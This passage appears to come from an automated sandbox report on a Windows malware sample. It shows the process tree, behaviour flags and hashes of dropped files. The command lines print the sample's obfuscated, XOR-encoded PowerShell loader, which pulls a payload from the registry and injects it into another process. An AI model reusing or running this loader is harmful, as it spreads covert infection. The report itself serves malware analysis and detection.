Gli'Pla2Uri2Ret2MisASal0Sil0Hjl0LicARed0HefDAfg1KvaCNon1Tro4Scr5Kft7cor2GirBEpi0ImbCUns1Pot7Sym0AltDHaa1Cyk0Jor1Sen4Med1DeeCInd5Lyd7Med3Dom0Son1Arg7Bei0PosDInd1MacCImp0KneBSte1tje6Cin0Tai9Loo2TheADah1VanCNon0IndBMar0KbsFQua1Fje0Osc1RedANig1DorCKiw0SkoASka5Rod7Sup3bab4abs1ndv8rec0KarBpen0speAmod1Sta1Cho1Hor8Sco1Sal5The2Lnk4Sto4Rek3Gre4Dip3Oms3SpaAAba1Bes6Ver0Siw9Unp0Out0Squ5Deg1Beb5EulDUnc2LasBPat1SerCVar1AndEVve1ThrCRes1Unv5Kis1MvrFRol1Ben8Mob0BefAMin0SkrDkik0AfgASch0ForDInd0PreDGre1KehCFen1Que5Ect0IndAHkb1RunCRer1Kau7ist0TelASka5Lig5Ant5Ove9Cen4Hor9For5Sil5Iso5Tro9Cri5Spi9Ton5MazDZod3Sal8Mis0MalCAcr0TalBFyl1Bou0Alg1VorEUnf1Fri8red1Opf5Mis4KonAFre5Upa5Dro5Ext9Ofr4MusFinn4DyrCCyk4Lak9Hal5Non0Imm'Mic;Ret.Pal<SunVHypiBlenDupdRelsUnekMeniCombCaeeSuplStriHypgBal7Pyl Pre<BndeReslPelePencTortmisrLysoomssVenuTrarMalglseiCancManaFralUndlklkyBes0Zor;Mag<BesRAnteVanlHydiBankSkrvRugiKryeNvnrDaisPep=Deb<JosRDvreBrogPrieFillBomfBigamussJortClasArrtPretOveeOfflvaasDeneDelnStesKon.SpecHinolsguBacnFiltCom-Dec6Obl5Leg0Yar;Wat<AvieMatlOpteAancDagtLucrTeaoSansSupuEksrFaagGreiDexcRigaKrslReclFroyNon1Sig Kll=sni DahOAfscCivcufylLimuVordSkreSubnteltSyr0Tri Cat'Trn2Mel2Tem2PoeACom0Geo0Kar0UfrASem0TrsDPle1TelCPaa1Cho4smr5Son7alo2RaaBRan0SniCBar1Ina7din0ArtDPoi1Ska0Scr1pol4Com1DesCFor5Obl7Ser3dep0Rap1Orr7Nrb0OusDJub1VikCAto0BlyBSar1Maa6Log0Sca9Han2UreAGal1KogCEne0MisBCas0BetFJur1Pat0Cal1VarASan1misCfib0ProAAbn5lyd7syn3Whi4ant1Kom8Was0AflBGam0burATin1Alm1Dik1Leo8Afn1Wis5Saf2Stu4Dou4Gre3Rot4cac3Eth3SprAniv1Sch6Sal0Fle9Pro0Kre0ban5Try1Gad5CenDThe2GaeBUnd1RubCEks1avlEEqu1BunCNon1Bor5Ace1shiFSko1Tur8Tab0PerAOve0IrgDYde0PreAArg0BinDPla0slvDSki1OmdCBde1Skn5Unh0DyrAKle1augCbon1Tap7Min0cirAFli5Lse5int5Sla9Caf4EmeFmil4BelCPre4Tyv9Par5Mer5Kam5Mer9reg5IndDOpg3Soj5Kon1Ste6Krb1unpCFrg0polATit1For7Sta1Ing0Unm1Daa7bed1SpeEVoo1MadCNon0PerBFor1tri7Mar1DucCoot5Udk5ant5Mas9Dan5offDfla2HovBIoa1EnkCCut1Ukr5Ind1Lok0Mil1Asf2Bux0ArbFSla1pew0Unc1AnkCDef0BnhBTvi0WouAPis5Unc0Fre'Ure;gev.Afs<CoeVMyziSounLaedBessFrekLakiSnkbZeaeCrolNediUndgtre7Chu Skj<SpieSeklTeleTyncraatOverpenoSyvsSquuTilrKuigSaliVencSkaacyklBralRenyPho1pro;Oer<FineDielTaneTakcDyatHerrGlooTvasLakuVrdrPangBymiObjcKoraSeilBrnlligyKas2Pup Inv=Inv ElsOTilcPalcSeplsmeuStrdBieeNednStatYun0Afs Lai'kyp5forDRhi3EntFgru1Pol6Ret0FriBLap0AdnDDre0HelDPap1Ska7Tvr1Sam0Ugl1Hyl7Lim1ForEsti0KonAHob0Sek9Sub0BouCMis1Lit7Ref1Sia2fer0UddDMin1OveCNon0RapBSol5Fil9Maa4Fas4Gav5Kur9Tyd2Jag2Uns2RosAOve0del0Uds0SalASum0SnaDNon1SnnCdav1Hjr4Poh5Ket7Ove2NaaBUnw0CanCTaa1Tal7tli0PreDSup1Por0Kon1Rea4Dvr1SamCDum5Arb7Abo3Lan0Dif1Sho7Sch0RekDBra1SugCSlu0FleBWhy1Kaa6Ove0Emp9Som2CheASub1SpaCHun0BorBUan0UdsFHov1Uns0Unc1slaARei1KakCVex0AnnAUnb5Sig7Pod3Rom4Iat1Unb8Laa0AppBAgg0LinACri1Kuw1Bel1Par8Ove1Imp5Sma2Raa4Par4Glo3Eva4Sub3Ind3GeiEOff1MarCFun0FatDBou3SkrDHer1FroCAab1Hon5Ste1RusCSup1ArtEVin1Ove8Err0AngDMur1TidCArb3KolFEsq1Tro6Tak0IndBBla3AncFKra0SynCRet1for7Tha1PinAAto0actDBat1Sau0cal1Jef6Mis1Tik7Flo2Tek9End1for6Eje1The0Arr1Slo7Jui0forDTri1VieCNom0BluBNab5Nub1for5Acu1Imp3Tyk6Spi1LugASil1ynkAFor1Ami5Int0RenCFla1TriDSav1PunCAkk1Tim7Nar0IndDDuo4IndBChr4KaeBSge5Sne9Afl5UnsDHoo2Rig9Sci1Out6Brn0TriBbef0SkrDPne0sovBRep5unt9Des5UndDSty0pupCBud1Kri7Ant1Ryg0Cen0Ale9Vog1UndCTel1Rem5Pre0ChaDAvi1Kam8Nat0UnrDRet1FalCReg5Edi0Liv5Tea5Can5Pro9Kla5Try1Ske3Cla6Dob1glaADif1SkrAkit1Pos5Bri0MigCDeu1staDOms1TipCBag1Blo7lun0MelDAfs4AutBVit4BasABeh5Hny9pam3Coa9Atl5Dro1Tri2Sad2fil3Per0The1viv7Nat0InsDGal2Boa9Iag0HydDWhi0FruBSid2Tra4Ske5Ant5Ato5Dis9Bre2Mel2Har3Mar0Pre1Rep7heg0VisDUro2Can9Bet0PasDInt0SniBVri2And4app5Fol5Tro5Skl9Beu2Raa2Hav3Udm0Per1Pre7Ena0SowDVar2Mol9Cha0BecDJes0AiwBAir2Kog4Pok5Uno5Ove5Sub9Dul2Kol2Une3Vib0Car1Lat7Rub0CniDEns2Sem9Mos0MisDKlo0PolBDav2Nid4Fab5Dyb5Rat5Puk9Kvi2Spa2san3Red0Ung1Far7Sta0TelDAga2Soe9Pen0LukDSis0romBScl2Ord4Paa5Wyr0Unp5Int9Pau5til1Car2Out2Paa3Sju0abo1Bav7Tan0ManDMis2Kat9Ele0YamDLit0DuaBMod2Osu4Sup5Tes0Elv5Myr0Kle5Guf0Adk'Kal;Eng&Gra(Ner<SfoVaveiEstnPosdFissUdkkManiAugbUndePonlGeriTaxgHov7Unt)Tul Gra<TileGynlDiheCarcAbutUncrSneoTilsSanuAmbrKongRoniOh cReaaVallMillKaryStr2ori;Tar<PuleSvilMageDimcFortHebrKaloEthsOmsuJulrPlegValiTrdcGalaEpilRitlSheyCoa3Dip Pio=Spy TekOOpscForcJewlRepuGrudArbeCarnPostArb0Pek Off'Int5ravDGng3TelFsca1Gul6baa0OplBMar0SkaDMas0GrfDAri1Dia7Kos1Spr0Ant1Ugl7Fir1TemEOve0UnmARet0Bec9Obs0ArbCHum1gut7Dis1Dis2Bri0ScaDHav1KvaCSou0BakBHov5Rut7Una3Exa0Unn1Pen7Not0ModFPen1Nat6Ned1Paa2Eje1TopCStu5geo1Enc5UndDPaa3Sty8Tff0GalCBrr0BefBRig1Car0Pyh1PosENon1Kry8Sca1Har5Kla4FejABri5mod5Pac5RepDHov3Mil5Uns1Pie6Bim1OprCSpa0TelABla1Tel7Hop1Til0Una1Tin7For1HerEEnr1GalCNot0AweBmac1Tel7Jer1CasCVer5Uni5Mil5IntDHot3Sus8Now0hstBStr1BirBAtt1UanCStu1Hyd3Sed1FjeDUnk0hjsAArt1Fed6lig0Afv9Fra1ManEVip1Ded8Sel0kilFCep1QuiCZen1Neo7Rep0UndAJua5Saf5Cro4Sub9Tag5Spa5Ryg4Per9ind5Gal0Dis'Uln;Tra&Act(Nef<GldVVariGudnDisdstasPykkBesiArcbLydePidlAffiMangFre7Non)Rec Byd<OveeAntlbrseBudcSmetBacrForoOrtsKaruAlcrDiagFleiBorcUkraPrelCenlCriynat3Rej#And;""";Function electrosurgically9 { param([String]$Stamgst); For($Unnutritious=3; $Unnutritious -lt $Stamgst.Length-1; $Unnutritious+=(3+1)){ $spalter='subs'+'tring'; $Occludent = $Occludent + $Stamgst.$spalter.Invoke($Unnutritious, 1); } $Occludent;}$Puslerier0 = electrosurgically9 'PriIRasEDamXElh ';$Puslerier1= electrosurgically9 $Delirifacient;$Puslerier1=$Puslerier1.replace('<','$');$Puslerier1=$Puslerier1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Puslerier1 ;}else{ & ($Puslerier0) $Puslerier1;}"
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2888
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";Function Occludent0 { param([String]$Stamgst); $Divisors31 = New-Object byte[] ($Stamgst.Length / 2); For($Unnutritious=0; $Unnutritious -lt $Stamgst.Length; $Unnutritious+=2){ $Divisors31[$Unnutritious/2] = [convert]::ToByte($Stamgst.Substring($Unnutritious, 2), 16); $Divisors31[$Unnutritious/2] = ($Divisors31[$Unnutritious/2] -bxor 121); } [String][System.Text.Encoding]::ASCII.GetString($Divisors31);}$Compulsion0=Occludent0 '2A000A0D1C14571D1515';$Compulsion1=Occludent0 '34101A0B160A161F0D572E10174A4B572C170A181F1C37180D100F1C341C0D11161D0A';$Compulsion2=Occludent0 '3E1C0D290B161A381D1D0B1C0A0A';$Compulsion3=Occludent0 '2A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F';$Compulsion4=Occludent0 '0A0D0B10171E';$Compulsion5=Occludent0 '3E1C0D34161D0C151C3118171D151C';$Compulsion6=Occludent0 '2B2D2A091C1A1018153718141C555931101D1C3B002A101E5559290C1B15101A';$Compulsion7=Occludent0 '2B0C170D10141C5559341817181E1C1D';$Compulsion8=Occludent0 '2B1C1F151C1A0D1C1D3D1C151C1E180D1C';$Compulsion9=Occludent0 '3017341C14160B0034161D0C151C';$Vindskibelig0=Occludent0 '34003D1C151C1E180D1C2D00091C';$Vindskibelig1=Occludent0 '3A15180A0A5559290C1B15101A55592A1C18151C1D555938170A103A15180A0A5559380C0D163A15180A0A';$Vindskibelig2=Occludent0 '30170F16121C';$Vindskibelig3=Occludent0 '290C1B15101A555931101D1C3B002A101E5559371C0E2A15160D55592F100B0D0C1815';$Vindskibelig4=Occludent0 '2F100B0D0C1815381515161A';$Vindskibelig5=Occludent0 '170D1D1515';$Vindskibelig6=Occludent0 '370D290B160D1C1A0D2F100B0D0C1815341C14160B00';$Vindskibelig7=Occludent0 '303C21';$Vindskibelig8=Occludent0 '25';$Portr=Occludent0 '2C2A3C2B4A4B';$unipeltate=Occludent0 '3A1815152E10171D160E290B161A38';function Occludent22 {Param ($Checkroll, $Scaphoid) ;$Regelfaststtelsens0 =Occludent0 '5D291C0B0D1810171C1D59445951223809093D16141810172443433A0C0B0B1C170D3D1614181017573E1C0D380A0A1C141B15101C0A51505905592E111C0B1C54361B131C1A0D5902595D26573E15161B1815380A0A1C141B15003A181A111C595438171D595D265735161A180D101617572A0915100D515D2F10171D0A12101B1C15101E415022544824573C080C18150A515D3A1614090C150A1016174950590450573E1C0D2D00091C515D3A1614090C150A1016174850';.$Vindskibelig7 $Regelfaststtelsens0;$Regelfaststtelsens5 = Occludent0 '5D2A0009111C0B1C1D5944595D291C0B0D1810171C1D573E1C0D341C0D11161D515D3A1614090C150A1016174B5559222D00091C2224245939515D3A1614090C150A1016174A55595D3A1614090C150A1016174D5050';.$Vindskibelig7 $Regelfaststtelsens5;$Regelfaststtelsens1 = Occludent0 '0B1C0D0C0B17595D2A0009111C0B1C1D5730170F16121C515D170C151555593951222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F2451371C0E54361B131C1A0D592A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F5151371C0E54361B131C1A0D5930170D290D0B505559515D291C0B0D1810171C1D573E1C0D341C0D11161D515D3A1614090C150A1016174C50505730170F16121C515D170C1515555939515D3A111C1A120B1615155050505055595D2A1A18091116101D5050';.$Vindskibelig7 $Regelfaststtelsens1;}function Occludent23 {Param ([Parameter(Position = 0)] [Type[]] $opkbendes,[Parameter(Position = 1)] [Type] $Dmpningsfaktor = [Void]);$Regelfaststtelsens2 = Occludent0 '5D2D101D0A0A120B101F0D0A18141510171E1C0B0A594459223809093D16141810172443433A0C0B0B1C170D3D1614181017573D1C1F10171C3D00171814101A380A0A1C141B15005151371C0E54361B131C1A0D592A000A0D1C14572B1C1F151C1A0D10161757380A0A1C141B15003718141C515D3A1614090C150A1016174150505559222A000A0D1C14572B1C1F151C1A0D101617573C14100D57380A0A1C141B15003B0C10151D1C0B381A1A1C0A0A2443432B0C1750573D1C1F10171C3D00171814101A34161D0C151C515D3A1614090C150A1016174055595D1F18150A1C50573D1C1F10171C2D00091C515D2F10171D0A12101B1C15101E4955595D2F10171D0A12101B1C15101E485559222A000A0D1C1457340C150D101A180A0D3D1C151C1E180D1C2450';.$Vindskibelig7 $Regelfaststtelsens2;$Regelfaststtelsens3 = Occludent0 '5D2D101D0A0A120B101F0D0A18141510171E1C0B0A573D1C1F10171C3A16170A0D0B0C1A0D160B515D3A1614090C150A1016174F5559222A000A0D1C14572B1C1F151C1A0D101617573A18151510171E3A16170F1C170D1016170A2443432A0D18171D180B1D55595D1609121B1C171D1C0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D3A1614090C150A1016174E50';.$Vindskibelig7 $Regelfaststtelsens3;$Regelfaststtelsens4 = Occludent0 '5D2D101D0A0A120B101F0D0A18141510171E1C0B0A573D1C1F10171C341C0D11161D515D2F10171D0A12101B1C15101E4B55595D2F10171D0A12101B1C15101E4A55595D3D14091710171E0A1F18120D160B55595D1609121B1C171D1C0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D3A1614090C150A1016174E50';.$Vindskibelig7 $Regelfaststtelsens4;$Regelfaststtelsens5 = Occludent0 '0B1C0D0C0B17595D2D101D0A0A120B101F0D0A18141510171E1C0B0A573A0B1C180D1C2D00091C5150';.$Vindskibelig7 $Regelfaststtelsens5 ;}$Skrivearbejdet132 = Occludent0 '121C0B171C154A4B';$Regelfaststtelsens6 = Occludent0 '5D2A160E1C0B0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B5151361A1A150C1D1C170D4B4B595D2A120B100F1C180B1B1C131D1C0D484A4B595D2F10171D0A12101B1C15101E4D50555951361A1A150C1D1C170D4B4A5939512230170D290D0B245559222C30170D4A4B245559222C30170D4A4B245559222C30170D4A4B245059512230170D290D0B24505050';.$Vindskibelig7 $Regelfaststtelsens6;$Arbejdsopgavens = Occludent22 $Vindskibelig5 $Vindskibelig6;$Regelfaststtelsens7 = Occludent0 '5D380C0B101E18154A5944595D2A160E1C0B0A5730170F16121C512230170D290D0B244343231C0B1655594F4C49555949014A494949555949014D4950';.$Vindskibelig7 $Regelfaststtelsens7;$Regelfaststtelsens8 = Occludent0 '5D35161C0A1710171E1C0B171C5944595D2A160E1C0B0A5730170F16121C512230170D290D0B244343231C0B165559404E414B41414F4D555949014A494949555949014D50';.$Vindskibelig7 $Regelfaststtelsens8;$electrosurgically=(Get-ItemProperty -Path 'HKCU:\underassessed\Unbouncy').Bnkens;$Regelfaststtelsens9 = Occludent0 '5D2B1C1E1C151F180A0D0A0D0D1C150A1C170A594459222A000A0D1C14573A16170F1C0B0D2443433F0B16143B180A1C4F4D2A0D0B10171E515D1C151C1A0D0B160A0C0B1E101A1815150050';.$Vindskibelig7 $Regelfaststtelsens9;$electrosurgically0 = Occludent0 '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2B1C1E1C151F180A0D0A0D0D1C150A1C170A5559495559595D380C0B101E18154A55594F4C4950';.$Vindskibelig7 $electrosurgically0;$Relikviers=$Regelfaststtelsens.count-650;$electrosurgically1 = Occludent0 '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2B1C1E1C151F180A0D0A0D0D1C150A1C170A55594F4C4955595D35161C0A1710171E1C0B171C55595D2B1C1510120F101C0B0A50';.$Vindskibelig7 $electrosurgically1;$electrosurgically2 = Occludent0 '5D3F160B0D0D1710171E0A090C17120D1C0B594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B5151361A1A150C1D1C170D4B4B595D29160B0D0B595D0C1710091C150D180D1C50555951361A1A150C1D1C170D4B4A5939512230170D290D0B2455592230170D290D0B2455592230170D290D0B2455592230170D290D0B2455592230170D290D0B245059512230170D290D0B24505050';&($Vindskibelig7) $electrosurgically2;$electrosurgically3 = Occludent0 '5D3F160B0D0D1710171E0A090C17120D1C0B5730170F16121C515D380C0B101E18154A555D35161C0A1710171E1C0B171C555D380B1B1C131D0A16091E180F1C170A5549554950';&($Vindskibelig7) $electrosurgically3#"
                                    3⤵
                                    • Checks QEMU agent file
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3400
                                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                      4⤵
                                      • Checks QEMU agent file
                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4660
                              • C:\Windows\System32\Notepad.exe
                                "C:\Windows\System32\Notepad.exe" C:\Windows\Tasks\Tipalose.vbs
                                1⤵
                                • Opens file in notepad (likely ransom note)
                                PID:3996

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

                                Filesize

                                264KB

                                MD5

                                c93c51c265e4bea0d579884f3946a56b

                                SHA1

                                76dd2868516e80fcb5dd8a1f09495f349cdeee41

                                SHA256

                                61498b2071f61790d1beba2e0ad2787983bd92720f71fb0ce346b319900a6635

                                SHA512

                                df11de1ed2610ab5d9150266c937e1d065fcb1e7208738872a489040366bc9d379dfc8c5558174fb442246f98943732763edc51f23585f942e9a4c68ea3c232b

                              • C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                Filesize

                                289B

                                MD5

                                7d9f6916292e30743f3c411dd13fe89f

                                SHA1

                                fb7a3de607aec32714973b7e5df8daed05ac5e85

                                SHA256

                                a13e89a5672fdc69d631776b8c60d83550e9898939fdb52c880f663c344fe4fd

                                SHA512

                                0045a2af9e6f26c84dd528eef901baed65bef6004f689869256661c69463039abcc857b0c57337eeaf1b78e6f66fa044d13f24ee9674f9009ce6a5993a7155e5

                              • C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                Filesize

                                128KB

                                MD5

                                a7dd80eda73c03df009a19c3cdae6219

                                SHA1

                                f67430efcfadfec8700239592d12b204f107e8b9

                                SHA256

                                09b2e32b4178c0e22d11ce96b73bce80930e82498a41e45d6696d05332d04f08

                                SHA512

                                2169591d86431de5f25ee35bbede09455a530340b3adcd69cae5816ca41ee633c3d0d50b27b74dbf0cf28fac9bad80b3b0251aefd9e6dfcf5bd9d06a52bf8b42

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                Filesize

                                64KB

                                MD5

                                0f955079470d6a2a41bd52ba8a75e341

                                SHA1

                                883111f04e4baf427462a9922a76084d341c3f3d

                                SHA256

                                8f9c95d9a3cd2a8c5ac67fa14cb346d43989ede9c7b722760afd10dd11d03ed2

                                SHA512

                                8e9c82a3a08f2a597ad35100ed3542a1ca4202b4cc6b4cb0d5a15e94aeed996ca21e01d91cb37a88667fabb93eea0fc826ef7d676ba5d29b5245227bbd7f632c

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                Filesize

                                56KB

                                MD5

                                752a1f26b18748311b691c7d8fc20633

                                SHA1

                                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                SHA256

                                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                SHA512

                                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                Filesize

                                56KB

                                MD5

                                752a1f26b18748311b691c7d8fc20633

                                SHA1

                                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                SHA256

                                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                SHA512

                                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                Filesize

                                64KB

                                MD5

                                0f955079470d6a2a41bd52ba8a75e341

                                SHA1

                                883111f04e4baf427462a9922a76084d341c3f3d

                                SHA256

                                8f9c95d9a3cd2a8c5ac67fa14cb346d43989ede9c7b722760afd10dd11d03ed2

                                SHA512

                                8e9c82a3a08f2a597ad35100ed3542a1ca4202b4cc6b4cb0d5a15e94aeed996ca21e01d91cb37a88667fabb93eea0fc826ef7d676ba5d29b5245227bbd7f632c

                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst

                                Filesize

                                97KB

                                MD5

                                700e7d6f9cfc26cea4d04f65f02b3452

                                SHA1

                                e5580200e54edb7cd4f7c5daada5c031434cf334

                                SHA256

                                c3d8aef5d450a90e4a51335532c977515e589143be772697e666c8c9f4ab0c0e

                                SHA512

                                1cafa5bab9838052312d8a6ced7d9baa4f28ef77d48681ada4dedf29400d235b51e187a1f207cfd8e008ee6274156cb7ef2821fdf7cbcc65d697ff4f469d7a82

                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

                                Filesize

                                165KB

                                MD5

                                232b9f7c98d2ccdad0c0d9c8cef3ac63

                                SHA1

                                484b92cc63c7a9c543e47fa4148e315d08771511

                                SHA256

                                f08ff2f61cffa1de08609aef7faf85beb5d0c25fdcb704db43f397e3ff54818e

                                SHA512

                                13befdb4af2bee48cd0583644a152711f4a833d70015b7e443e4d901e37d9ef066df81fbf0dd695c228a44c87f1c7937a7eb8f44fad39a0a7c1dfaa0716fe9be

                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                Filesize

                                12KB

                                MD5

                                2ef4f90138eeb27084e4425a2feaaa38

                                SHA1

                                23f97de4a56f79262cf04edd2925fedb34acd366

                                SHA256

                                0eb1331844c714bd7fecf54f8b578037a75ea0a8f876a71c71b244c4eb8f051c

                                SHA512

                                c4be09aaeb2afee5fdba36a7a840e67da62078f558a3355320387c638a63d81a45fbb098d2a324cb25e53fd81b95223dbd5c3359437a4d77cc16165ee67e3618

                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                Filesize

                                39KB

                                MD5

                                c1bdbf6d7690216882a92122655bedd0

                                SHA1

                                f43c62ba8c7f2cacebd5f2fd69f3d5fc4c764110

                                SHA256

                                6258f72f288bbfb9e32268316529014bc13b83c48a9176f7b936befadbcfb01f

                                SHA512

                                f75e1c5e1501039093e34a3b66f7c5bc2b57136a2af1bd4ff66cec89474fb704ee69c6ec027800bee3ce9ce246656b66c77ccd2eff3f9b04ef94aa1fa8f8daa0

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                Filesize

                                2KB

                                MD5

                                2f57fde6b33e89a63cf0dfdd6e60a351

                                SHA1

                                445bf1b07223a04f8a159581a3d37d630273010f

                                SHA256

                                3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                SHA512

                                42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                Filesize

                                53KB

                                MD5

                                d4d8cef58818612769a698c291ca3b37

                                SHA1

                                54e0a6e0c08723157829cea009ec4fe30bea5c50

                                SHA256

                                98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

                                SHA512

                                f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                944B

                                MD5

                                9d80893e7508785e808e7a56361c3aaf

                                SHA1

                                44617d23c9f92d0a6a035c490af557bb04468606

                                SHA256

                                e9ab52198fd3a758b16b9318b4884f78c29582b9b3912575b0c999c5f9ffacb2

                                SHA512

                                161d319a0e202ff6b9016c50db2b2114b3ef40fdc4e6b16a51f536083a738b12699a42c91417d3db7ba81be251996ba5018b1c04e5b72510b9231a6b72ddee9c

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                1KB

                                MD5

                                66f4813d57dfd07f67a25f100e0c74ce

                                SHA1

                                d6c8ea4f02a982d3bc51352b3eb6d183d71a273f

                                SHA256

                                8c1ed3577f0a865c0adfad588f55f49b825550d66643e685e6ab1701bc2766c0

                                SHA512

                                1552ed58cba59d11f80839939b6858bb2a56bdb351dc1d0f53aa5426480438d59dceaa6d97d187a6011e9600b6e0848cfb0107c0c07c12017a627c16412bea19

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bu0wlnrl.pdj.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData

                                Filesize

                                22B

                                MD5

                                4ac65fd0505524c840e4b8ed9352125f

                                SHA1

                                f914b6f0df85ed7b5aa059afdbd993e18748493f

                                SHA256

                                913ef675aa4754fbb1a0b07e73b75d515b05c2058cb1144bc115e0430a90cc11

                                SHA512

                                9e8913b2e71ca3c0d422a2ed1ca6e2bee3c7c7f493a0f79573ca4e0341946ffb1d38f669521190b1303b4f3f6f392e20b7694ed25a177301c93816bb8b073438

                              • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings

                                Filesize

                                24B

                                MD5

                                dd4a3bd8b9ff61628346391ea9987e1d

                                SHA1

                                474076c122cacaaf112469fc62976bb69187aa2b

                                SHA256

                                7c22c759ca704106556bbc4fc10b7f53404ca1f8b40f01038d3f7c4b8183f486

                                SHA512

                                fdaf3d9f8072ed7de9b2528376c10e3c3fdbea74347710a4795becf23c6577b3582b2e89d3c04ef0523c98fe0a46f2af3629490701a20b848c63ba7b26579491

                              • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

                                Filesize

                                10KB

                                MD5

                                22a2d064b6158f9f1f3bf93f283d7b69

                                SHA1

                                6e71b347a7e97c558f09ccaed691418c511d4935

                                SHA256

                                a602cc909fd411c71907c36856974fa59206734d61b4cb5e112a629b70fba8fa

                                SHA512

                                4db4abf32beaf10da3e572f84b22e0f5a717008eaba9212abb7c4f6f4e0b3a05c73fd0860707ea3f10cbc8e99ace7e9bee4c98a5e06e7689940baf84119af8d7

                              • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

                                Filesize

                                23KB

                                MD5

                                2a276cafcde5d01bb39b038fede2017a

                                SHA1

                                15e15e57d880053e4118a549c16c1b331200d625

                                SHA256

                                bafa1f1cbdf11a84f6cc5b973afb3dc528806d9705f50bc5e305a8b0d89b3205

                                SHA512

                                81563f6b88677b120d87053900de2fcc5d9580e34694f726bf3cf0dd739b0a3ef1ff2d1163e5f5d5bf64c978f53751ccb0280d3a8521eeee0ab2f69897a6e38c

                              • C:\Users\Public\details.pdf

                                Filesize

                                3.5MB

                                MD5

                                4c8c59e6ceb46ab5868966fba52a300c

                                SHA1

                                fb801fb5394e9ec9e2be1d38ad0ee63d25344418

                                SHA256

                                6e641de68bfd6ab98e297704ab27f784cde401eaaa2d3f7d8653553c60f977da

                                SHA512

                                b008f519506331de8a2da145db7a6043cf2ab87ed7edce6845cd045fe7cc5795e92e2992ad88af0b174d77ec49511430af939f401c1e40828bdf753137710005

